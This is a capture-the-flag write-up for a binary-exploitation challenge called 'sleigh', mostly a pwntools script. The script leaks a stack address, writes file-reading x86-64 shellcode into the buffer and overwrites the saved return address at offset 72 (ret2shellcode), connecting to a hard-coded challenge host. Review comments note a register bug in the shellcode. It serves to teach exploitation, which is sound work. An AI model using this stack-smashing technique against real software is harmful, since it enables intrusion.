Tags: shellcode bof pwn stack-smash 

Rating:

NX is disabled for the stack, meaning we can write shellcode onto the stack and execute it. The program also gives us a stack leak pointing to the start of the input buffer. So we write shellcode into the buffer, overflow the saved return address with the leaked address, ret2shellcode, profit.

```python
#!/usr/bin/env python3

from pwn import *

# Target binary. Setting context.binary lets asm()/pack()/flat() below pick up
# the binary's architecture and word size instead of needing them spelled out.
elf = ELF("./sleigh", checksec=False)
context.binary = elf
rop = ROP(elf)  # NOTE(review): never used below; the final payload is shellcode-only
#context.log_level = "debug"
# gdb script handed to gdb.debug() when the script is run with GDB=1 (see conn()).
gs = '''
continue
'''

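def conn():
    """Open a tube to the target.

    Selection is driven by pwntools' ``args``: ``GDB`` runs the binary under
    gdb with the ``gs`` script, ``REMOTE`` connects to the hosted instance,
    otherwise a plain local process is started.

    Returns:
        The pwntools tube for the chosen target.

    The GDB case is checked first: the original order spawned a local process
    (or opened the remote connection) and then discarded it when GDB was set,
    leaving a stray instance running behind the debugged one.
    """
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    if args.REMOTE:
        return remote("178.62.75.187", 31878)
    return process([elf.path])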

p = conn()  # tube to the target: remote, local, or local-under-gdb, chosen by conn()

# Shellcode to read flag.txt
# x86-64 payload that issues two raw syscalls, so it needs no libc and no
# known code addresses: open() the file, then sendfile() it to stdout. The
# filename lives after the code and is addressed RIP-relative, which keeps
# the payload position-independent wherever the leaked buffer sits.
# NOTE(review): `mov r8, 60` loads the 5th syscall argument; on x86-64 the
# 4th argument (sendfile's count) is passed in r10, which this code never
# sets, so the count is whatever r10 happened to hold at entry.
# A non-executable stack alone would have been sufficient to stop this payload.
shellcode = asm("""
/* open(flag.txt, 0, 0) */
lea rdi, [rip+flag]
xor rsi, rsi
xor rdx, rdx
push 2
pop rax
syscall

/*sendfile(1, rax, 0, 60) */
mov rdi, 1
mov rsi, rax
xor rdx, rdx
mov r8, 60
mov rax, 40
syscall

flag:
.string "flag.txt"
"""
)

p.sendlineafter(b">", b"1")  # choose menu option 1 at the prompt
p.recvuntil(b"sleigh: [")  # the leaked address is printed right after this marker
# 14 characters — presumably "0x" plus 12 hex digits, the usual width of a
# user-space stack address; verify against the program's output format.
stackleak = int(p.recv(14), 16)
info(f"Stack leak @ {stackleak}")  # NOTE(review): logged in decimal; {stackleak:#x} reads more naturally
# Shellcode at the start of the buffer; offset 72 is assumed to be the saved
# return address, which is pointed back at the buffer start (the leak).
payload = flat({0: shellcode, 72: pack(stackleak)})
p.sendlineafter(b">", payload)
p.interactive()
```